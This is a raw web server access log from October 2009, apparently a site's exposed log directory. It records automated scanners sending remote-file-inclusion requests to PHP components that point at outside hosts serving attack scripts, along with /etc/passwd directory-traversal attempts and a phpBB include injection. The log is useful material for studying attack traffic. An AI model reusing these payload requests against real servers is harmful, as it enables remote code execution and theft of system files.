211.223.201.177 - - [28/Oct/2009:05:40:38 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:40:43 -0400] "GET /logs/access_log.Q109081300%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:40:43 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
203.252.90.80 - - [28/Oct/2009:05:40:53 -0400] "GET /logs/access_log.Q109072000//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.kannunci.it/case/apache.jpg?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
204.124.181.194 - - [28/Oct/2009:05:41:04 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
204.124.181.194 - - [28/Oct/2009:05:41:05 -0400] "GET /logs/access_log.Q109080500//components/com_facileforms/facileforms.frame.php?ff_compath=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
204.124.181.194 - - [28/Oct/2009:05:41:05 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
69.73.181.125 - - [28/Oct/2009:05:41:06 -0400] "GET /logs/access_log.Q109092600/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnng.info/bbs/data/session/motu.txt? HTTP/1.1" 404 280 "-" "libwww-perl/5.831"
69.73.181.125 - - [28/Oct/2009:05:41:06 -0400] "GET /logs/access_log.Q109092600/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnng.info/bbs/data/session/motu.txt? HTTP/1.1" 404 280 "-" "libwww-perl/5.831"
69.73.181.125 - - [28/Oct/2009:05:41:20 -0400] "GET /logs/access_log.Q109092600/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnng.info/bbs/data/session/motu.txt? HTTP/1.1" 404 280 "-" "libwww-perl/5.831"
209.59.12.99 - - [28/Oct/2009:05:41:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.223.201.177 - - [28/Oct/2009:05:41:56 -0400] "GET /logs/error_log.Q109092100%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:42:07 -0400] "GET /logs/error_log.Q109092100%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.223.201.177 - - [28/Oct/2009:05:42:14 -0400] "GET /logs/error_log.Q109092100%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
204.124.181.194 - - [28/Oct/2009:05:42:29 -0400] "GET /logs/access_log.Q109080500%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
204.124.181.194 - - [28/Oct/2009:05:44:00 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
204.124.181.194 - - [28/Oct/2009:05:44:00 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
204.124.181.194 - - [28/Oct/2009:05:44:00 -0400] "GET /logs/access_log.Q109070700/components/com_performs/performs.php?mosConfig_absolute_path=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
204.124.181.194 - - [28/Oct/2009:05:44:04 -0400] "GET /logs/access_log.Q109060300/components/com_performs/performs.php?mosConfig_absolute_path=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
204.124.181.194 - - [28/Oct/2009:05:44:20 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
204.124.181.194 - - [28/Oct/2009:05:44:20 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
204.124.181.194 - - [28/Oct/2009:05:44:20 -0400] "GET /logs/access_log.Q109080500//components/com_facileforms/facileforms.frame.php?ff_compath=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
204.124.181.194 - - [28/Oct/2009:05:45:18 -0400] "GET /logs/access_log.Q109080500%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
199.120.90.223 - - [28/Oct/2009:05:45:46 -0400] "GET /index.php?page=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.812"
204.124.181.194 - - [28/Oct/2009:05:45:52 -0400] "GET /logs/access_log.Q109070700%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
204.124.181.194 - - [28/Oct/2009:05:45:52 -0400] "GET /logs/access_log.Q109060300%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:05:46:18 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:05:46:22 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:05:46:26 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:05:46:26 -0400] "GET /logs/access_log.Q109081300%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:05:46:27 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:05:46:27 -0400] "GET /logs/access_log.Q109081300%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Oct/2009:05:46:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.62.136.226 - - [28/Oct/2009:05:46:40 -0400] "GET /logs//skin/zero_vote/setup.php?dir=http://www.forester66.com/forum/Smileys/classic/lolid1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
200.62.136.226 - - [28/Oct/2009:05:46:40 -0400] "GET //skin/zero_vote/setup.php?dir=http://www.forester66.com/forum/Smileys/classic/lolid1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
200.62.136.226 - - [28/Oct/2009:05:46:40 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/setup.php?dir=http://www.forester66.com/forum/Smileys/classic/lolid1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
174.143.3.188 - - [28/Oct/2009:05:46:51 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
174.143.3.188 - - [28/Oct/2009:05:46:51 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 245 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
174.143.3.188 - - [28/Oct/2009:05:46:51 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
174.143.3.188 - - [28/Oct/2009:05:46:51 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
200.62.136.226 - - [28/Oct/2009:05:47:21 -0400] "GET //skin/zero_vote/setup.php?dir=http://www.forester66.com/forum/Smileys/classic/lolid1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
200.62.136.226 - - [28/Oct/2009:05:47:21 -0400] "GET /logs//skin/zero_vote/setup.php?dir=http://www.forester66.com/forum/Smileys/classic/lolid1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
200.62.136.226 - - [28/Oct/2009:05:47:21 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/setup.php?dir=http://www.forester66.com/forum/Smileys/classic/lolid1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
209.126.189.35 - - [28/Oct/2009:05:47:23 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
209.126.189.35 - - [28/Oct/2009:05:47:23 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
209.126.189.35 - - [28/Oct/2009:05:47:23 -0400] "GET /logs/access_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.126.189.35 - - [28/Oct/2009:05:47:32 -0400] "GET /logs/error_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
209.126.189.35 - - [28/Oct/2009:05:47:35 -0400] "GET /logs/access_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.126.189.35 - - [28/Oct/2009:05:47:35 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
209.126.189.35 - - [28/Oct/2009:05:47:36 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
209.126.189.35 - - [28/Oct/2009:05:47:46 -0400] "GET /logs/error_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:05:47:51 -0400] "GET /logs/error_log.Q109092100%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:05:47:51 -0400] "GET /logs/error_log.Q109092100%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
200.62.136.226 - - [28/Oct/2009:05:47:55 -0400] "GET /logs//skin/zero_vote/setup.php?dir=http://www.forester66.com/forum/Smileys/classic/lolid1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
200.62.136.226 - - [28/Oct/2009:05:47:55 -0400] "GET //skin/zero_vote/setup.php?dir=http://www.forester66.com/forum/Smileys/classic/lolid1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
200.62.136.226 - - [28/Oct/2009:05:47:55 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/setup.php?dir=http://www.forester66.com/forum/Smileys/classic/lolid1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
204.124.181.194 - - [28/Oct/2009:05:48:11 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
204.124.181.194 - - [28/Oct/2009:05:48:11 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
204.124.181.194 - - [28/Oct/2009:05:48:11 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
204.124.181.194 - - [28/Oct/2009:05:48:15 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
204.124.181.194 - - [28/Oct/2009:05:48:15 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
204.124.181.194 - - [28/Oct/2009:05:48:15 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
204.124.181.194 - - [28/Oct/2009:05:48:29 -0400] "GET //main.php?sayfa=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
204.124.181.194 - - [28/Oct/2009:05:48:29 -0400] "GET /logs//main.php?sayfa=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
204.124.181.194 - - [28/Oct/2009:05:48:29 -0400] "GET /logs/access_log.Q109100700//main.php?sayfa=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
204.124.181.194 - - [28/Oct/2009:05:48:34 -0400] "GET /logs/access_log.Q109072900//main.php?sayfa=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
204.124.181.194 - - [28/Oct/2009:05:48:42 -0400] "GET /logs/access_log.Q109052200%20%20//modules/TotalCalendar/about.php?inc_dir=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
204.124.181.194 - - [28/Oct/2009:05:48:57 -0400] "GET /logs/access_log.Q109052200%20%20//modules/TotalCalendar/about.php?inc_dir=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
199.120.90.223 - - [28/Oct/2009:05:49:06 -0400] "GET /logs/access_log.Q109050800/index.php?page=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.812"
199.120.90.223 - - [28/Oct/2009:05:49:06 -0400] "GET /index.php?page=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.812"
199.120.90.223 - - [28/Oct/2009:05:49:06 -0400] "GET /logs/index.php?page=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.812"
204.124.181.194 - - [28/Oct/2009:05:50:02 -0400] "GET /logs/access_log.Q109100700%20%20//main.php?sayfa=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
204.124.181.194 - - [28/Oct/2009:05:50:43 -0400] "GET /logs/access_log.Q109072900%20%20//main.php?sayfa=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Oct/2009:05:51:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.47.7.71 - - [28/Oct/2009:05:51:48 -0400] "GET ////?DOCUMENT_ROOT=http://mobilemagic.sanook.com/contentlibrary/fx29id1.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
61.47.7.71 - - [28/Oct/2009:05:51:48 -0400] "GET /logs/error_log.Q109071000////?DOCUMENT_ROOT=http://mobilemagic.sanook.com/contentlibrary/fx29id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
61.47.7.71 - - [28/Oct/2009:05:51:48 -0400] "GET /logs/error_log.Q109082400////?DOCUMENT_ROOT=http://mobilemagic.sanook.com/contentlibrary/fx29id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
61.47.7.71 - - [28/Oct/2009:05:51:48 -0400] "GET /logs////?DOCUMENT_ROOT=http://mobilemagic.sanook.com/contentlibrary/fx29id1.txt?? HTTP/1.1" 200 23669 "-" "Mozilla/5.0"
61.97.43.5 - - [28/Oct/2009:05:51:52 -0400] "GET /logs//zboard//skin/daerew_DICAgallery_GD/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
61.97.43.5 - - [28/Oct/2009:05:51:52 -0400] "GET /logs/access_log.Q109051800//zboard//skin/daerew_DICAgallery_GD/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
61.97.43.5 - - [28/Oct/2009:05:51:52 -0400] "GET //zboard//skin/daerew_DICAgallery_GD/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
122.155.5.84 - - [28/Oct/2009:05:52:09 -0400] "GET /logs/access_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
122.155.5.84 - - [28/Oct/2009:05:52:09 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
122.155.5.84 - - [28/Oct/2009:05:52:09 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
122.155.5.84 - - [28/Oct/2009:05:52:15 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
122.155.5.84 - - [28/Oct/2009:05:52:15 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
122.155.5.84 - - [28/Oct/2009:05:52:15 -0400] "GET /logs/access_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
122.155.5.84 - - [28/Oct/2009:05:52:15 -0400] "GET /logs/error_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
122.155.5.84 - - [28/Oct/2009:05:52:19 -0400] "GET /logs/error_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
188.51.50.142 - - [28/Oct/2009:05:52:23 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
188.51.50.142 - - [28/Oct/2009:05:52:23 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
188.51.50.142 - - [28/Oct/2009:05:52:25 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
188.51.50.142 - - [28/Oct/2009:05:52:25 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
122.155.5.84 - - [28/Oct/2009:05:52:47 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
122.155.5.84 - - [28/Oct/2009:05:52:47 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
122.155.5.84 - - [28/Oct/2009:05:52:47 -0400] "GET /logs/access_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
202.88.229.100 - - [28/Oct/2009:05:52:51 -0400] "GET /logs/access_log.Q109080500//components/com_facileforms/facileforms.frame.php?ff_compath=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
122.155.5.84 - - [28/Oct/2009:05:52:51 -0400] "GET /logs/error_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://www.hyungs.net/bbs//data/zfxid1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
202.88.229.100 - - [28/Oct/2009:05:52:52 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
202.88.229.100 - - [28/Oct/2009:05:52:52 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
199.120.90.223 - - [28/Oct/2009:05:52:53 -0400] "GET /logs/access_log.Q109101300/index.php?page=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.812"
88.84.137.165 - - [28/Oct/2009:05:52:57 -0400] "GET /logs/access_log.Q109062000//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://lanaalaadi.com/gallery/data/media/2/3/db.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.803"
88.84.137.165 - - [28/Oct/2009:05:52:57 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://lanaalaadi.com/gallery/data/media/2/3/db.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
88.84.137.165 - - [28/Oct/2009:05:52:57 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://lanaalaadi.com/gallery/data/media/2/3/db.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.803"
88.84.137.165 - - [28/Oct/2009:05:52:57 -0400] "GET /logs/access_log.Q109072300//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://lanaalaadi.com/gallery/data/media/2/3/db.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.803"
61.97.43.5 - - [28/Oct/2009:05:52:59 -0400] "GET /logs/access_log.Q109051600//zboard//skin/daerew_DICAgallery_GD/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
66.249.65.201 - - [28/Oct/2009:05:53:32 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0183B94E598924004679051+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
61.96.111.133 - - [28/Oct/2009:05:54:46 -0400] "GET /logs/access_log.Q109081300//admin/classes/TplLoad.php?full_path_to_public_program=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:05:54:55 -0400] "GET /logs/error_log.Q109092100//admin/classes/TplLoad.php?full_path_to_public_program=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
67.218.116.132 - - [28/Oct/2009:05:54:49 -0400] "GET /logs/access_log.Q109101600 HTTP/1.0" 200 3965580 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
202.102.240.88 - - [28/Oct/2009:05:56:30 -0400] "GET /logs/access_log.Q109081800/?custompluginfile[]=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 225 "-" "libwww-perl/5.65"
174.143.3.188 - - [28/Oct/2009:05:56:33 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 250 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
174.143.3.188 - - [28/Oct/2009:05:56:33 -0400] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
174.143.3.188 - - [28/Oct/2009:05:56:33 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 245 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
174.143.3.188 - - [28/Oct/2009:05:56:34 -0400] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 245 "-" "Mozilla/4.61 [en] (OS/2; U)"
202.102.240.88 - - [28/Oct/2009:05:56:41 -0400] "GET /logs/?custompluginfile[]=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 200 23662 "-" "libwww-perl/5.65"
61.96.111.133 - - [28/Oct/2009:05:56:56 -0400] "GET /logs/access_log.Q109081300//admin/classes/TplLoad.php?full_path_to_public_program=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
61.96.111.133 - - [28/Oct/2009:05:57:05 -0400] "GET /logs/error_log.Q109092100//admin/classes/TplLoad.php?full_path_to_public_program=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
208.49.206.117 - - [28/Oct/2009:05:57:14 -0400] "GET /logs/access_log.Q109090400//include/mail.inc.php?skin_board_path=http://niswa.fileave.com/id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
208.49.206.117 - - [28/Oct/2009:05:57:14 -0400] "GET //include/mail.inc.php?skin_board_path=http://niswa.fileave.com/id1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
208.49.206.117 - - [28/Oct/2009:05:57:14 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://niswa.fileave.com/id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
202.88.229.100 - - [28/Oct/2009:05:57:23 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
202.88.229.100 - - [28/Oct/2009:05:57:28 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
202.88.229.100 - - [28/Oct/2009:05:57:28 -0400] "GET /logs/access_log.Q109070700/components/com_performs/performs.php?mosConfig_absolute_path=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
202.88.229.100 - - [28/Oct/2009:05:57:36 -0400] "GET /logs/access_log.Q109060300/components/com_performs/performs.php?mosConfig_absolute_path=http://scriptsagent.com/copyme.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
